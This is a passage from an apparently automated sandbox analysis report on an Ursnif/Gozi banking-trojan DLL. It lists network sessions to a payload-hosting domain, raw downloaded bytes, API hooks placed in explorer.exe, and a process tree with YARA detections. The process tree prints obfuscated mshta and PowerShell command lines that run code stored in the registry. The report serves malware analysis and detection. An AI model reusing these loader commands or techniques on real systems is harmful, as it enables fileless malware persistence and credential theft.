ed 1e 7a 7b 97 c7 49 b4 1a a9 5e 07 c1 14 8c 05 07 02 41 d6 7e 01 94 fe 16 34 37 d5 2d 1b 6b 4d fe 9c 9d e0 f2 53 c1 29 b9 7e 93 c4 91
                            Data Ascii: N9Yg:A!^FrW:Il39EN;;XV4ZH.cdW[,nIp3\FMn4rHu<IME(M$>RR}QE-kGpTi+h&t3BRMLzY07lZN)pr7M2z{I^A~47-kMS)~


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            9192.168.2.64982279.110.52.144443C:\Windows\SysWOW64\rundll32.exe
                            TimestampkBytes transferredDirectionData
                            2021-12-14 09:21:40 UTC1892OUTGET /tire/YD_2F3yJEGCuLOsTrEXJLr/HYLMnHFPJYjiw/7tKlG8tS/_2BbBwzFFUBrFGVOQLc5STZ/vcc52sXSbU/E9hymn9Lr8ZbD9qxB/Q3FPG7MgMTRh/kGaKVJ7xEwY/wcc7fc8ZQUc61Z/HBzqpDy8uRQEtHRcSSjiO/YH3881lPkApc1W7g/7TBJUbFugsSMYgd/TFU1BUGgDWNFTw3w_2/FKBKIQxkn/wyKgErA3/rpA.eta HTTP/1.1
                            Cache-Control: no-cache
                            Connection: Keep-Alive
                            Pragma: no-cache
                            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                            Host: berukoneru.website
                            2021-12-14 09:21:40 UTC1893INHTTP/1.1 200 OK
                            Server: nginx/1.20.1
                            Date: Tue, 14 Dec 2021 09:21:40 GMT
                            Content-Type: application/zip
                            Content-Length: 1869
                            Connection: close
                            X-Powered-By: PHP/5.4.16
                            Set-Cookie: PHPSESSID=1i518ljo1cass7agikmih55pd4; path=/; domain=.berukoneru.website
                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                            Cache-Control: public
                            Pragma: no-cache
                            Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:21:40 GMT; path=/
                            Content-Transfer-Encoding: Binary
                            Content-Disposition: attachment; filename=client32.bin
                            2021-12-14 09:21:40 UTC1893INData Raw: a1 e8 4e 39 d8 b2 11 ec 16 ab 59 67 3a eb be 41 8e d7 95 21 5e 96 1a 46 72 fd 57 3a 49 c4 80 6c 33 39 f9 45 a2 84 bd 4e e5 18 0f 14 dd 3b 3b 58 0c 09 c6 a5 b8 56 34 db b1 5a 48 a4 05 d2 a0 f5 2e 63 af 64 57 86 5b 2c 8e d6 87 1c 9b e4 6e f0 15 94 49 8a 70 8c cf 96 33 5c 46 98 eb cb 4d 6e 34 72 48 75 c6 13 a9 9b b5 1a cc ea 3c 49 4d c4 45 28 c6 8f 9b ea 4d 8e 90 a8 24 3e 52 52 b8 7d 9e 51 45 2d a5 19 6b fe 47 ac e1 f2 70 a1 54 ac c9 69 f9 2b 68 af e0 ab fc f4 d3 a0 26 74 33 99 1e 08 42 1f 07 52 4d d0 14 4c ec d9 f8 e7 7a 59 30 d0 37 a6 84 0c e4 6c 5a f0 8b 90 0f 17 4e 29 70 b6 b3 93 ec 05 72 a4 a2 b0 a2 df 37 ef 86 4d 32 f1 ed 1e 7a 7b 97 c7 49 b4 1a a9 5e 07 c1 14 8c 05 07 02 41 d6 7e 01 94 fe 16 34 37 d5 2d 1b 6b 4d fe 9c 9d e0 f2 53 c1 29 b9 7e 93 c4 91
                            Data Ascii: N9Yg:A!^FrW:Il39EN;;XV4ZH.cdW[,nIp3\FMn4rHu<IME(M$>RR}QE-kGpTi+h&t3BRMLzY07lZN)pr7M2z{I^A~47-kMS)~


                            Code Manipulations

                            User Modules

                            Hook Summary

                            Function NameHook TypeActive in Processes
                            api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIATexplorer.exe
                            api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIATexplorer.exe
                            CreateProcessAsUserWEATexplorer.exe
                            CreateProcessAsUserWINLINEexplorer.exe
                            CreateProcessWEATexplorer.exe
                            CreateProcessWINLINEexplorer.exe
                            CreateProcessAEATexplorer.exe
                            CreateProcessAINLINEexplorer.exe

                            Processes

                            Process: explorer.exe, Module: user32.dll
                            Function NameHook TypeNew Data
                            api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFD88935200
                            api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT4E12000
                            Process: explorer.exe, Module: WININET.dll
                            Function NameHook TypeNew Data
                            api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessWIAT7FFD88935200
                            api-ms-win-core-registry-l1-1-0.dll:RegGetValueWIAT4E12000
                            Process: explorer.exe, Module: KERNEL32.DLL
                            Function NameHook TypeNew Data
                            CreateProcessAsUserWEAT7FFD8893521C
                            CreateProcessAsUserWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                            CreateProcessWEAT7FFD88935200
                            CreateProcessWINLINE0xFF 0xF2 0x25 0x50 0x00 0x00
                            CreateProcessAEAT7FFD8893520E
                            CreateProcessAINLINE0xFF 0xF2 0x25 0x50 0x00 0x00

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            Analysis Process: loaddll32.exe PID: 6132 Parent PID: 2040

                            General

                            Start time:10:20:20
                            Start date:14/12/2021
                            Path:C:\Windows\System32\loaddll32.exe
                            Wow64 process (32bit):true
                            Commandline:loaddll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll"
                            Imagebase:0x2d0000
                            File size:116736 bytes
                            MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, Author: Joe Security
                            Reputation:moderate

                            Chronological Activities

                            Analysis Process: cmd.exe PID: 7004 Parent PID: 6132

                            General

                            Start time:10:20:20
                            Start date:14/12/2021
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1
                            Imagebase:0x2a0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Chronological Activities

                            Analysis Process: regsvr32.exe PID: 7016 Parent PID: 6132

                            General

                            Start time:10:20:21
                            Start date:14/12/2021
                            Path:C:\Windows\SysWOW64\regsvr32.exe
                            Wow64 process (32bit):true
                            Commandline:regsvr32.exe /s C:\Users\user\Desktop\61b85f75e6a7c.dll
                            Imagebase:0x940000
                            File size:20992 bytes
                            MD5 hash:426E7499F6A7346F0410DEAD0805586B
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, Author: Joe Security
                            Reputation:high

                            Chronological Activities

                            Analysis Process: rundll32.exe PID: 7056 Parent PID: 7004

                            General

                            Start time:10:20:21
                            Start date:14/12/2021
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe "C:\Users\user\Desktop\61b85f75e6a7c.dll",#1
                            Imagebase:0xad0000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, Author: Joe Security
                            Reputation:high

                            Chronological Activities

                            Analysis Process: rundll32.exe PID: 7084 Parent PID: 6132

                            General

                            Start time:10:20:21
                            Start date:14/12/2021
                            Path:C:\Windows\SysWOW64\rundll32.exe
                            Wow64 process (32bit):true
                            Commandline:rundll32.exe C:\Users\user\Desktop\61b85f75e6a7c.dll,DllRegisterServer
                            Imagebase:0xad0000
                            File size:61952 bytes
                            MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, Author: Joe Security
                            Reputation:high

                            Chronological Activities

                            Analysis Process: mshta.exe PID: 2528 Parent PID: 3440

                            General

                            Start time:10:21:44
                            Start date:14/12/2021
                            Path:C:\Windows\System32\mshta.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gxum='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gxum).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                            Imagebase:0x7ff72b8c0000
                            File size:14848 bytes
                            MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Chronological Activities

                            Analysis Process: mshta.exe PID: 2596 Parent PID: 3440

                            General

                            Start time:10:21:44
                            Start date:14/12/2021
                            Path:C:\Windows\System32\mshta.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Aw2g='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Aw2g).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                            Imagebase:0x7ff72b8c0000
                            File size:14848 bytes
                            MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Chronological Activities

                            Analysis Process: mshta.exe PID: 3688 Parent PID: 3440

                            General

                            Start time:10:21:44
                            Start date:14/12/2021
                            Path:C:\Windows\System32\mshta.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Acrf='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Acrf).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                            Imagebase:0x7ff72b8c0000
                            File size:14848 bytes
                            MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Chronological Activities

                            Analysis Process: mshta.exe PID: 5724 Parent PID: 3440

                            General

                            Start time:10:21:45
                            Start date:14/12/2021
                            Path:C:\Windows\System32\mshta.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\mshta.exe" "about:<hta:application><script>Sou4='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Sou4).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\MarkChart'));if(!window.flag)close()</script>
                            Imagebase:0x7ff72b8c0000
                            File size:14848 bytes
                            MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate

                            Chronological Activities

                            Analysis Process: powershell.exe PID: 6448 Parent PID: 2596

                            General

                            Start time:10:21:46
                            Start date:14/12/2021
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                            Imagebase:0x7ff743d60000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET
                            Reputation:high

                            Chronological Activities

                            Analysis Process: conhost.exe PID: 6468 Parent PID: 6448

                            General

                            Start time:10:21:47
                            Start date:14/12/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff61de10000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Chronological Activities

                            Analysis Process: powershell.exe PID: 5640 Parent PID: 5724

                            General

                            Start time:10:21:47
                            Start date:14/12/2021
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                            Imagebase:0x7ff743d60000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            Chronological Activities

                            Analysis Process: powershell.exe PID: 5784 Parent PID: 2528

                            General

                            Start time:10:21:47
                            Start date:14/12/2021
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                            Imagebase:0x7ff743d60000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            Chronological Activities

                            Analysis Process: conhost.exe PID: 3628 Parent PID: 5640

                            General

                            Start time:10:21:47
                            Start date:14/12/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff61de10000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Chronological Activities

                            Analysis Process: powershell.exe PID: 6444 Parent PID: 3688

                            General

                            Start time:10:21:47
                            Start date:14/12/2021
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name xxbuqnvca -value gp; new-alias -name ylvcupeita -value iex; ylvcupeita ([System.Text.Encoding]::ASCII.GetString((xxbuqnvca "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UtilDiagram))
                            Imagebase:0x7ff743d60000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            Chronological Activities

                            Analysis Process: conhost.exe PID: 6740 Parent PID: 5784

                            General

                            Start time:10:21:47
                            Start date:14/12/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff61de10000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Chronological Activities

                            Analysis Process: conhost.exe PID: 5848 Parent PID: 6444

                            General

                            Start time:10:21:48
                            Start date:14/12/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff61de10000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Chronological Activities

                            Analysis Process: csc.exe PID: 6620 Parent PID: 5784

                            General

                            Start time:10:22:01
                            Start date:14/12/2021
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jtmpm3o0\jtmpm3o0.cmdline
                            Imagebase:0x7ff746f40000
                            File size:2739304 bytes
                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            Chronological Activities

                            Analysis Process: csc.exe PID: 5796 Parent PID: 6444

                            General

                            Start time:10:22:03
                            Start date:14/12/2021
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\kon0vos3\kon0vos3.cmdline
                            Imagebase:0x7ff746f40000
                            File size:2739304 bytes
                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            Chronological Activities

                            Analysis Process: control.exe PID: 160 Parent PID: 7056

                            General

                            Start time:10:22:06
                            Start date:14/12/2021
                            Path:C:\Windows\System32\control.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\control.exe -h
                            Imagebase:0x7ff60c110000
                            File size:117760 bytes
                            MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Chronological Activities

                            Analysis Process: cvtres.exe PID: 6496 Parent PID: 6620

                            General

                            Start time:10:22:06
                            Start date:14/12/2021
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES391B.tmp" "c:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP"
                            Imagebase:0x7ff61bc20000
                            File size:47280 bytes
                            MD5 hash:33BB8BE0B4F547324D93D5D2725CAC3D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Chronological Activities

                            Analysis Process: csc.exe PID: 4904 Parent PID: 5640

                            General

                            Start time:10:22:08
                            Start date:14/12/2021
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hupbkl0t\hupbkl0t.cmdline
                            Imagebase:0x7ff746f40000
                            File size:2739304 bytes
                            MD5 hash:B46100977911A0C9FB1C3E5F16A5017D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            Chronological Activities

                            Analysis Process: control.exe PID: 5832 Parent PID: 7084

                            General

                            Start time:10:22:09
                            Start date:14/12/2021
                            Path:C:\Windows\System32\control.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\control.exe -h
                            Imagebase:0x7ff60c110000
                            File size:117760 bytes
                            MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, Author: CCN-CERT

                            Chronological Activities

                            Analysis Process: control.exe PID: 5952 Parent PID: 7016

                            General

                            Start time:10:22:09
                            Start date:14/12/2021
                            Path:C:\Windows\System32\control.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\control.exe -h
                            Imagebase:0x7ff60c110000
                            File size:117760 bytes
                            MD5 hash:625DAC87CB5D7D44C5CA1DA57898065F
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, Author: CCN-CERT
                            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, Author: Joe Security
                            • Rule: GoziRule, Description: Win32.Gozi, Source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, Author: CCN-CERT

                            Chronological Activities

                            Analysis Process: cvtres.exe PID: 6312 Parent PID: 5796

                            General

                            Start time:10:22:10
                            Start date:14/12/2021
                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            Wow64 process (32bit):false
